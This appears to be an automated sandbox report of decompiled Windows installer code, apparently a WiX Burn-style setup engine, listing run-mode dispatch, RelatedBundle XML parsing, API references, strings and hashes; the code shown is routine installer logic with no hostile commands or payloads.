												_t164 = E004016ED(_t144, _v312,  &_v1520);
												__eflags = _t164;
												if(_t164 >= 0) {
													L30:
													_t151 = _v296;
													_t143 = _v1496;
													 *_t151 = _v1276;
													goto L31;
												}
												_push("Failed to run per-user mode.");
												goto L21;
											}
											_t130 = _t102 - 1;
											__eflags = _t130;
											if(_t130 == 0) {
												_t164 = E004014BB(_t144, _t149, _v312, _t150,  &_v1520);
												__eflags = _t164;
												if(_t164 >= 0) {
													goto L30;
												}
												_push("Failed to run per-machine mode.");
												goto L21;
											}
											_t133 = _t130 - 1;
											__eflags = _t133;
											if(_t133 == 0) {
												_v308 = _v300;
												_t164 = E004016A6(_v312,  &_v1520);
												__eflags = _t164;
												if(_t164 >= 0) {
													goto L30;
												}
												_push("Failed to run embedded mode.");
												goto L21;
											}
											__eflags = _t133 == 1;
											if(_t133 == 1) {
												_t164 = E00401928(_t150, _a12);
												__eflags = _t164;
												if(_t164 >= 0) {
													goto L30;
												}
												_push("Failed to run RunOnce mode.");
												goto L21;
											}
											_t164 = 0x8000ffff;
											_push("Invalid run mode.");
										} else {
											_push("Failed to initialize core.");
										}
										goto L21;
									}
									_t139 = GetLastError();
									__eflags = _t139;
									_t167 =  <=  ? _t139 : _t139 & 0x0000ffff | 0x80070000;
									__eflags = _t167;
									_t164 =  >=  ? 0x80004005 : _t167;
									E004300D9(0x80004005, "engine.cpp", 0x7a, _t164);
									_push("Failed to get OS info.");
									goto L21;
								}
								_push("Failed to initialize XML util.");
								goto L21;
							}
							_push("Failed to initialize Wiutil.");
							goto L21;
						}
						_push("Failed to initialize Regutil.");
						goto L21;
					}
					_push("Failed to initialize COM.");
					goto L21;
				} else {
					_push("Failed to initialize engine state.");
					L21:
					E00430A57();
					_t151 = _v296;
					_t144 = _t164;
					L31:
					if(_v304 != 0) {
						E004380AB(_v304);
					}
					if(_t164 < 0 && _v564 == 0) {
						E00430D33(_t144, _t149, _t151, 0, L"Setup", L"_Failed", L"txt", 0, 0, 0);
					}
					E004089D9( &_v1336);
					E00413F69(_t143, _t144, _t149, _v1260);
					if(_t143 != 0) {
						_t123 = _v1464;
						if(_t123 != 0 && _t123 != 6) {
							E00402003(2, 0xa0000008, E0040E82A(_t123));
							_t170 = _t170 + 0xc;
							_t143 = 0;
							_t164 = 0x80070bc2;
						}
					}
					E00401A7C(_t143, _t144, _t149, _t151,  &_v1520);
					if(_v316 != 0) {
						E004360CC();
					}
					if(_v324 != 0) {
						E00435810();
					}
					if(_v328 != 0) {
						E0043299B();
					}
					if(_v300 != 0) {
						__imp__CoUninitialize();
					}
					if(_v308 != 0) {
						if(_t164 >= 0) {
							_t153 =  *_t151;
						} else {
							_t153 = _t164;
						}
						_push(E0040E33B(_t143));
						E00402003(2, 0x20000007, _t153);
						if(_t143 != 0) {
							_push(0xa0000005);
							E00402003();
							_t144 = 2;
						}
					}
					_t152 = _v320;
					if(_t152 != 0) {
						E00430935(_t144, _t152, 0);
					}
					if(_t143 != 0) {
						E004011BF(_t149);
					}
					_t191 = _t152;
					if(_t152 != 0) {
						E00431001(_t144, _t152, _t191, 0);
					}
					return L004267AF(_t164, _v8 ^ _t168, _t152, _t164);
				}
			}


















































                                                                                                                                                                  0x00401bd3
                                                                                                                                                                  0x00401bd3
                                                                                                                                                                  0x00401bdc
                                                                                                                                                                  0x00401be3
                                                                                                                                                                  0x00401bec
                                                                                                                                                                  0x00401bf1
                                                                                                                                                                  0x00401bfa
                                                                                                                                                                  0x00401bff
                                                                                                                                                                  0x00401c0b
                                                                                                                                                                  0x00401c0c
                                                                                                                                                                  0x00401c0d
                                                                                                                                                                  0x00401c13
                                                                                                                                                                  0x00401c19
                                                                                                                                                                  0x00401c1f
                                                                                                                                                                  0x00401c25
                                                                                                                                                                  0x00401c2b
                                                                                                                                                                  0x00401c30
                                                                                                                                                                  0x00401c3b
                                                                                                                                                                  0x00401c3c
                                                                                                                                                                  0x00401c3d
                                                                                                                                                                  0x00401c43
                                                                                                                                                                  0x00401c49
                                                                                                                                                                  0x00401c4b
                                                                                                                                                                  0x00401c50
                                                                                                                                                                  0x00401c63
                                                                                                                                                                  0x00401c77
                                                                                                                                                                  0x00401c7d
                                                                                                                                                                  0x00401c82
                                                                                                                                                                  0x00401c89
                                                                                                                                                                  0x00401c91
                                                                                                                                                                  0x00401c93
                                                                                                                                                                  0x00401ca4
                                                                                                                                                                  0x00401cb1
                                                                                                                                                                  0x00401cb6
                                                                                                                                                                  0x00401cbc
                                                                                                                                                                  0x00401cc1
                                                                                                                                                                  0x00401cc3
                                                                                                                                                                  0x00401cc5
                                                                                                                                                                  0x00401cd7
                                                                                                                                                                  0x00401cdd
                                                                                                                                                                  0x00401ce4
                                                                                                                                                                  0x00401ce6
                                                                                                                                                                  0x00401cf8
                                                                                                                                                                  0x00401cfe
                                                                                                                                                                  0x00401d05
                                                                                                                                                                  0x00401d07
                                                                                                                                                                  0x00401d19
                                                                                                                                                                  0x00401d26
                                                                                                                                                                  0x00401d30
                                                                                                                                                                  0x00401d36
                                                                                                                                                                  0x00401d38
                                                                                                                                                                  0x00401d78
                                                                                                                                                                  0x00401d82
                                                                                                                                                                  0x00401d84
                                                                                                                                                                  0x00401d87
                                                                                                                                                                  0x00401d88
                                                                                                                                                                  0x00401d92
                                                                                                                                                                  0x00401d93
                                                                                                                                                                  0x00401d99
                                                                                                                                                                  0x00401d9f
                                                                                                                                                                  0x00401db1
                                                                                                                                                                  0x00401db6
                                                                                                                                                                  0x00401db9
                                                                                                                                                                  0x00401dbf
                                                                                                                                                                  0x00401dc7
                                                                                                                                                                  0x00401dcc
                                                                                                                                                                  0x00401dcc
                                                                                                                                                                  0x00401dcc
                                                                                                                                                                  0x00401dcc
                                                                                                                                                                  0x00401ddf
                                                                                                                                                                  0x00401de1
                                                                                                                                                                  0x00401de3
                                                                                                                                                                  0x00401df2
                                                                                                                                                                  0x00401df2
                                                                                                                                                                  0x00401df5
                                                                                                                                                                  0x00401e8c
                                                                                                                                                                  0x00401ea4
                                                                                                                                                                  0x00401ea6
                                                                                                                                                                  0x00401ea8
                                                                                                                                                                  0x00401eb4
                                                                                                                                                                  0x00401eb4
                                                                                                                                                                  0x00401ec0
                                                                                                                                                                  0x00401ec6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401ec6
                                                                                                                                                                  0x00401eaa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401eaa
                                                                                                                                                                  0x00401dfb
                                                                                                                                                                  0x00401dfb
                                                                                                                                                                  0x00401dfc
                                                                                                                                                                  0x00401e79
                                                                                                                                                                  0x00401e7b
                                                                                                                                                                  0x00401e7d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401e7f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401e7f
                                                                                                                                                                  0x00401dfe
                                                                                                                                                                  0x00401dfe
                                                                                                                                                                  0x00401dff
                                                                                                                                                                  0x00401e4e
                                                                                                                                                                  0x00401e59
                                                                                                                                                                  0x00401e5b
                                                                                                                                                                  0x00401e5d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401e5f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401e5f
                                                                                                                                                                  0x00401e01
                                                                                                                                                                  0x00401e02
                                                                                                                                                                  0x00401e2a
                                                                                                                                                                  0x00401e2c
                                                                                                                                                                  0x00401e2e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401e34
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401e34
                                                                                                                                                                  0x00401e04
                                                                                                                                                                  0x00401e09
                                                                                                                                                                  0x00401de5
                                                                                                                                                                  0x00401de5
                                                                                                                                                                  0x00401de5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401de3
                                                                                                                                                                  0x00401d3a
                                                                                                                                                                  0x00401d49
                                                                                                                                                                  0x00401d4b
                                                                                                                                                                  0x00401d53
                                                                                                                                                                  0x00401d55
                                                                                                                                                                  0x00401d60
                                                                                                                                                                  0x00401d65
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401d65
                                                                                                                                                                  0x00401d09
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401d09
                                                                                                                                                                  0x00401ce8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401ce8
                                                                                                                                                                  0x00401cc7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401cc7
                                                                                                                                                                  0x00401c95
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401c65
                                                                                                                                                                  0x00401c65
                                                                                                                                                                  0x00401e0e
                                                                                                                                                                  0x00401e0f
                                                                                                                                                                  0x00401e14
                                                                                                                                                                  0x00401e1b
                                                                                                                                                                  0x00401ec8
                                                                                                                                                                  0x00401ecf
                                                                                                                                                                  0x00401ed7
                                                                                                                                                                  0x00401ed7
                                                                                                                                                                  0x00401ede
                                                                                                                                                                  0x00401efe
                                                                                                                                                                  0x00401efe
                                                                                                                                                                  0x00401f0a
                                                                                                                                                                  0x00401f15
                                                                                                                                                                  0x00401f1c
                                                                                                                                                                  0x00401f1e
                                                                                                                                                                  0x00401f26
                                                                                                                                                                  0x00401f3b
                                                                                                                                                                  0x00401f40
                                                                                                                                                                  0x00401f43
                                                                                                                                                                  0x00401f45
                                                                                                                                                                  0x00401f45
                                                                                                                                                                  0x00401f26
                                                                                                                                                                  0x00401f51
                                                                                                                                                                  0x00401f5d
                                                                                                                                                                  0x00401f5f
                                                                                                                                                                  0x00401f5f
                                                                                                                                                                  0x00401f6b
                                                                                                                                                                  0x00401f6d
                                                                                                                                                                  0x00401f6d
                                                                                                                                                                  0x00401f79
                                                                                                                                                                  0x00401f7b
                                                                                                                                                                  0x00401f7b
                                                                                                                                                                  0x00401f87
                                                                                                                                                                  0x00401f89
                                                                                                                                                                  0x00401f89
                                                                                                                                                                  0x00401f96
                                                                                                                                                                  0x00401f9a
                                                                                                                                                                  0x00401fa0
                                                                                                                                                                  0x00401f9c
                                                                                                                                                                  0x00401f9c
                                                                                                                                                                  0x00401f9c
                                                                                                                                                                  0x00401fa8
                                                                                                                                                                  0x00401fb1
                                                                                                                                                                  0x00401fbb
                                                                                                                                                                  0x00401fbd
                                                                                                                                                                  0x00401fc4
                                                                                                                                                                  0x00401fca
                                                                                                                                                                  0x00401fca
                                                                                                                                                                  0x00401fbb
                                                                                                                                                                  0x00401fcb
                                                                                                                                                                  0x00401fd3
                                                                                                                                                                  0x00401fd7
                                                                                                                                                                  0x00401fd7
                                                                                                                                                                  0x00401fde
                                                                                                                                                                  0x00401fe0
                                                                                                                                                                  0x00401fe0
                                                                                                                                                                  0x00401fe5
                                                                                                                                                                  0x00401fe7
                                                                                                                                                                  0x00401feb
                                                                                                                                                                  0x00401feb
                                                                                                                                                                  0x00402000
                                                                                                                                                                  0x00402000

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00401036: InitializeCriticalSection.KERNEL32(00401C5F,?,00000000,?,?,00401C5F), ref: 0040105B
                                                                                                                                                                    • Part of subcall function 00401036: InitializeCriticalSection.KERNEL32(00401D2F,?,?,00401C5F), ref: 00401064
                                                                                                                                                                    • Part of subcall function 00401036: GetCurrentProcess.KERNEL32(00000000,004020E3,004020CB,?,?,00401C5F), ref: 00401082
                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,00000003,00000000,?,?,?,?,?,00000000), ref: 00401C89
                                                                                                                                                                  • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401F89
                                                                                                                                                                    • Part of subcall function 00401928: CommandLineToArgvW.SHELL32(?,?,?,00000000,00000000,?,?,?,?), ref: 0040195A
                                                                                                                                                                    • Part of subcall function 00401928: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00401966
                                                                                                                                                                    • Part of subcall function 00401928: CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 00401A50
                                                                                                                                                                    • Part of subcall function 004014BB: ReleaseMutex.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040168E
                                                                                                                                                                    • Part of subcall function 004014BB: CloseHandle.KERNEL32(00000000,?,?,?,00401E79,?,?,?), ref: 00401697
                                                                                                                                                                    • Part of subcall function 004016ED: IsWindow.USER32(?), ref: 004018F7
                                                                                                                                                                    • Part of subcall function 004016ED: PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0040190A
                                                                                                                                                                    • Part of subcall function 004016ED: CloseHandle.KERNEL32(00000000,?,?,?,00401EA4,?,?), ref: 00401919
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleInitialize$CriticalSection$ArgvCommandCurrentErrorLastLineMessageMutexPostProcessReleaseUninitializeWindow
                                                                                                                                                                  • String ID: 3.8.1128.0$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Invalid run mode.$Setup$_Failed$engine.cpp$txt
                                                                                                                                                                  • API String ID: 3179169480-854919460
                                                                                                                                                                  • Opcode ID: d6a9fd4956d7a37eb11e11ee659dc5582ea64274af61c1080618648297fc7606
                                                                                                                                                                  • Instruction ID: 269aca870fc2965c0f0fd274ea9ada3b7ec7bfe6ea1d79aa34964ccbf0876cb8
                                                                                                                                                                  • Opcode Fuzzy Hash: d6a9fd4956d7a37eb11e11ee659dc5582ea64274af61c1080618648297fc7606
                                                                                                                                                                  • Instruction Fuzzy Hash: 6AB19371E406299BDB319B65CC45BEE76B8AF08715F0001ABF908B7291D73C9E818FD9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409A34, Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 230COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                  			E00409A34(void* __edi, intOrPtr _a4, int _a8) {
				signed int _v8;
				int _v12;
				void* _v16;
				void* _v20;
				char _v24;
				intOrPtr* _t82;
				intOrPtr _t108;
				intOrPtr* _t125;
				intOrPtr* _t126;
				intOrPtr _t141;
				intOrPtr _t143;

				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_t143 = E00435FBE(_a8, L"RelatedBundle",  &_v16);
				if(_t143 >= 0) {
					_t82 = _v16;
					_t124 =  *_t82;
					_t143 =  *((intOrPtr*)( *_t82 + 0x20))(_t82,  &_v24);
					__eflags = _t143;
					if(_t143 >= 0) {
						_a8 = 0;
						__eflags = _v24;
						if(_v24 > 0) {
							_t141 = _a4;
							while(1) {
								_t143 = E00435F1D(_t124, _v16,  &_v20, 0);
								__eflags = _t143;
								if(_t143 < 0) {
									break;
								}
								_t143 = E00435B5E(_v20, L"Action",  &_v12);
								__eflags = _t143;
								if(_t143 < 0) {
									_push("Failed to get @Action.");
									goto L32;
								} else {
									_t143 = E00435B5E(_v20, L"Id",  &_v8);
									__eflags = _t143;
									if(_t143 < 0) {
										_push("Failed to get @Id.");
										goto L32;
									} else {
										__eflags = CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Detect", 0xffffffff) - 2;
										if(__eflags != 0) {
											__eflags = CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Upgrade", 0xffffffff) - 2;
											if(__eflags != 0) {
												__eflags = CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Addon", 0xffffffff) - 2;
												if(__eflags != 0) {
													__eflags = CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Patch", 0xffffffff) - 2;
													if(__eflags != 0) {
														_t143 = 0x80070057;
														E00430A57(0x80070057, "Invalid value for @Action: %ls", _v12);
													} else {
														_t143 = E0043109A(_t141 + 0x2c, __eflags, _t141 + 0x2c,  *(_t141 + 0x30) + 1, 4, 5);
														__eflags = _t143;
														if(_t143 < 0) {
															_push("Failed to resize Patch code array in registration");
															goto L32;
														} else {
															_t124 =  *((intOrPtr*)(_t141 + 0x2c));
															 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x2c)) +  *(_t141 + 0x30) * 4)) = _v8;
															_v8 = _v8 & 0x00000000;
															_t66 = _t141 + 0x30;
															 *_t66 =  *(_t141 + 0x30) + 1;
															__eflags =  *_t66;
															goto L22;
														}
													}
												} else {
													_t143 = E0043109A(_t141 + 0x24, __eflags, _t141 + 0x24,  *(_t141 + 0x28) + 1, 4, 5);
													__eflags = _t143;
													if(_t143 < 0) {
														_push("Failed to resize Addon code array in registration");
														goto L32;
													} else {
														_t124 =  *((intOrPtr*)(_t141 + 0x24));
														 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x24)) +  *(_t141 + 0x28) * 4)) = _v8;
														_v8 = _v8 & 0x00000000;
														 *(_t141 + 0x28) =  *(_t141 + 0x28) + 1;
														goto L22;
													}
												}
											} else {
												_t143 = E0043109A(_t141 + 0x1c, __eflags, _t141 + 0x1c,  *(_t141 + 0x20) + 1, 4, 5);
												__eflags = _t143;
												if(_t143 < 0) {
													_push("Failed to resize Upgrade code array in registration");
													goto L32;
												} else {
													_t124 =  *((intOrPtr*)(_t141 + 0x1c));
													 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x1c)) +  *(_t141 + 0x20) * 4)) = _v8;
													_v8 = _v8 & 0x00000000;
													 *(_t141 + 0x20) =  *(_t141 + 0x20) + 1;
													goto L22;
												}
											}
										} else {
											_t143 = E0043109A(_t141 + 0x14, __eflags, _t141 + 0x14,  *(_t141 + 0x18) + 1, 4, 5);
											__eflags = _t143;
											if(_t143 < 0) {
												_push("Failed to resize Detect code array in registration");
												L32:
												_push(_t143);
												E00430A57();
											} else {
												_t124 =  *((intOrPtr*)(_t141 + 0x14));
												 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x14)) +  *(_t141 + 0x18) * 4)) = _v8;
												_v8 = _v8 & 0x00000000;
												 *(_t141 + 0x18) =  *(_t141 + 0x18) + 1;
												L22:
												_t108 = _a8 + 1;
												_a8 = _t108;
												__eflags = _t108 - _v24;
												if(_t108 < _v24) {
													continue;
												} else {
												}
											}
										}
									}
								}
								goto L34;
							}
							_push("Failed to get next RelatedBundle element.");
							goto L32;
						}
					} else {
						_push("Failed to get RelatedBundle element count.");
						goto L4;
					}
				} else {
					_push("Failed to get RelatedBundle nodes");
					L4:
					_push(_t143);
					E00430A57();
				}
				L34:
				_t125 = _v16;
				if(_t125 != 0) {
					 *((intOrPtr*)( *_t125 + 8))(_t125);
				}
				_t126 = _v20;
				if(_t126 != 0) {
					 *((intOrPtr*)( *_t126 + 8))(_t126);
				}
				if(_v12 != 0) {
					E004380AB(_v12);
				}
				if(_v8 != 0) {
					E004380AB(_v8);
				}
				return _t143;
			}














                                                                                                                                                                  0x00409a4a
                                                                                                                                                                  0x00409a4d
                                                                                                                                                                  0x00409a50
                                                                                                                                                                  0x00409a53
                                                                                                                                                                  0x00409a56
                                                                                                                                                                  0x00409a5e
                                                                                                                                                                  0x00409a62
                                                                                                                                                                  0x00409a6b
                                                                                                                                                                  0x00409a71
                                                                                                                                                                  0x00409a78
                                                                                                                                                                  0x00409a7a
                                                                                                                                                                  0x00409a7c
                                                                                                                                                                  0x00409a90
                                                                                                                                                                  0x00409a93
                                                                                                                                                                  0x00409a96
                                                                                                                                                                  0x00409aa3
                                                                                                                                                                  0x00409aa6
                                                                                                                                                                  0x00409ab4
                                                                                                                                                                  0x00409ab6
                                                                                                                                                                  0x00409ab8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409acf
                                                                                                                                                                  0x00409ad1
                                                                                                                                                                  0x00409ad3
                                                                                                                                                                  0x00409c5b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409ad9
                                                                                                                                                                  0x00409aea
                                                                                                                                                                  0x00409aec
                                                                                                                                                                  0x00409aee
                                                                                                                                                                  0x00409c54
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409af4
                                                                                                                                                                  0x00409b07
                                                                                                                                                                  0x00409b0a
                                                                                                                                                                  0x00409b51
                                                                                                                                                                  0x00409b54
                                                                                                                                                                  0x00409b9b
                                                                                                                                                                  0x00409b9e
                                                                                                                                                                  0x00409bde
                                                                                                                                                                  0x00409be1
                                                                                                                                                                  0x00409c3f
                                                                                                                                                                  0x00409c4a
                                                                                                                                                                  0x00409be3
                                                                                                                                                                  0x00409bf5
                                                                                                                                                                  0x00409bf7
                                                                                                                                                                  0x00409bf9
                                                                                                                                                                  0x00409c35
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409bfb
                                                                                                                                                                  0x00409bfe
                                                                                                                                                                  0x00409c04
                                                                                                                                                                  0x00409c07
                                                                                                                                                                  0x00409c0b
                                                                                                                                                                  0x00409c0b
                                                                                                                                                                  0x00409c0b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409c0b
                                                                                                                                                                  0x00409bf9
                                                                                                                                                                  0x00409ba0
                                                                                                                                                                  0x00409bb2
                                                                                                                                                                  0x00409bb4
                                                                                                                                                                  0x00409bb6
                                                                                                                                                                  0x00409c2e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409bb8
                                                                                                                                                                  0x00409bbb
                                                                                                                                                                  0x00409bc1
                                                                                                                                                                  0x00409bc4
                                                                                                                                                                  0x00409bc8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409bc8
                                                                                                                                                                  0x00409bb6
                                                                                                                                                                  0x00409b56
                                                                                                                                                                  0x00409b68
                                                                                                                                                                  0x00409b6a
                                                                                                                                                                  0x00409b6c
                                                                                                                                                                  0x00409c27
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409b72
                                                                                                                                                                  0x00409b75
                                                                                                                                                                  0x00409b7b
                                                                                                                                                                  0x00409b7e
                                                                                                                                                                  0x00409b82
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409b82
                                                                                                                                                                  0x00409b6c
                                                                                                                                                                  0x00409b0c
                                                                                                                                                                  0x00409b1e
                                                                                                                                                                  0x00409b20
                                                                                                                                                                  0x00409b22
                                                                                                                                                                  0x00409c20
                                                                                                                                                                  0x00409c67
                                                                                                                                                                  0x00409c67
                                                                                                                                                                  0x00409c68
                                                                                                                                                                  0x00409b28
                                                                                                                                                                  0x00409b2b
                                                                                                                                                                  0x00409b31
                                                                                                                                                                  0x00409b34
                                                                                                                                                                  0x00409b38
                                                                                                                                                                  0x00409c0e
                                                                                                                                                                  0x00409c11
                                                                                                                                                                  0x00409c12
                                                                                                                                                                  0x00409c15
                                                                                                                                                                  0x00409c18
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409c1e
                                                                                                                                                                  0x00409c18
                                                                                                                                                                  0x00409b22
                                                                                                                                                                  0x00409b0a
                                                                                                                                                                  0x00409aee
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409c6f
                                                                                                                                                                  0x00409c62
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409c62
                                                                                                                                                                  0x00409a7e
                                                                                                                                                                  0x00409a7e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409a7e
                                                                                                                                                                  0x00409a64
                                                                                                                                                                  0x00409a64
                                                                                                                                                                  0x00409a83
                                                                                                                                                                  0x00409a83
                                                                                                                                                                  0x00409a84
                                                                                                                                                                  0x00409a8a
                                                                                                                                                                  0x00409c70
                                                                                                                                                                  0x00409c70
                                                                                                                                                                  0x00409c75
                                                                                                                                                                  0x00409c7a
                                                                                                                                                                  0x00409c7a
                                                                                                                                                                  0x00409c7d
                                                                                                                                                                  0x00409c82
                                                                                                                                                                  0x00409c87
                                                                                                                                                                  0x00409c87
                                                                                                                                                                  0x00409c8e
                                                                                                                                                                  0x00409c93
                                                                                                                                                                  0x00409c93
                                                                                                                                                                  0x00409c9c
                                                                                                                                                                  0x00409ca1
                                                                                                                                                                  0x00409ca1
                                                                                                                                                                  0x00409cab

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00435B5E: VariantInit.OLEAUT32(?), ref: 00435B74
                                                                                                                                                                    • Part of subcall function 00435B5E: SysAllocString.OLEAUT32(?), ref: 00435B90
                                                                                                                                                                    • Part of subcall function 00435B5E: VariantClear.OLEAUT32(?), ref: 00435C17
                                                                                                                                                                    • Part of subcall function 00435B5E: SysFreeString.OLEAUT32(00000000), ref: 00435C22
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Detect,000000FF,?,0043C524,?,?,Action,?,?,?,00000000,?), ref: 00409B05
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF,?,?,00000000), ref: 00409B4F
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get RelatedBundle element count., xrefs: 00409A7E
                                                                                                                                                                  • RelatedBundle, xrefs: 00409A42
                                                                                                                                                                  • Failed to get RelatedBundle nodes, xrefs: 00409A64
                                                                                                                                                                  • Failed to get next RelatedBundle element., xrefs: 00409C62
                                                                                                                                                                  • Failed to resize Detect code array in registration, xrefs: 00409C20
                                                                                                                                                                  • Invalid value for @Action: %ls, xrefs: 00409C44
                                                                                                                                                                  • Failed to get @Id., xrefs: 00409C54
                                                                                                                                                                  • Detect, xrefs: 00409AF6
                                                                                                                                                                  • Patch, xrefs: 00409BCF
                                                                                                                                                                  • Failed to resize Upgrade code array in registration, xrefs: 00409C27
                                                                                                                                                                  • Failed to resize Patch code array in registration, xrefs: 00409C35
                                                                                                                                                                  • Addon, xrefs: 00409B8C
                                                                                                                                                                  • Failed to get @Action., xrefs: 00409C5B
                                                                                                                                                                  • Upgrade, xrefs: 00409B42
                                                                                                                                                                  • Action, xrefs: 00409AC2
                                                                                                                                                                  • Failed to resize Addon code array in registration, xrefs: 00409C2E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$CompareVariant$AllocClearFreeInit
                                                                                                                                                                  • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade
                                                                                                                                                                  • API String ID: 702752599-3660206225
                                                                                                                                                                  • Opcode ID: 289cd5b7f1ff4c2898b8f825eccadd8a80f5ca70ea8fab27eb773d131c107424
                                                                                                                                                                  • Instruction ID: 31795237cbe3677980191db509f1c8e62019c186d671a697189a7d8daed1bced
                                                                                                                                                                  • Opcode Fuzzy Hash: 289cd5b7f1ff4c2898b8f825eccadd8a80f5ca70ea8fab27eb773d131c107424
                                                                                                                                                                  • Instruction Fuzzy Hash: 3971A471D44616BBE714DBA0C941EAEB7B4FF04724F20466AEA21B72C1C738ED51CB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00423A9C, Relevance: 35.2, APIs: 11, Strings: 9, Instructions: 209COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 00423ABE
                                                                                                                                                                  • #20.CABINET(Function_000231FF,Function_00023254,Function_000232A4,Function_000233C9,Function_00023563,Function_0002320E,Function_0002345D,000000FF,?), ref: 00423B1A
                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00423D2A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
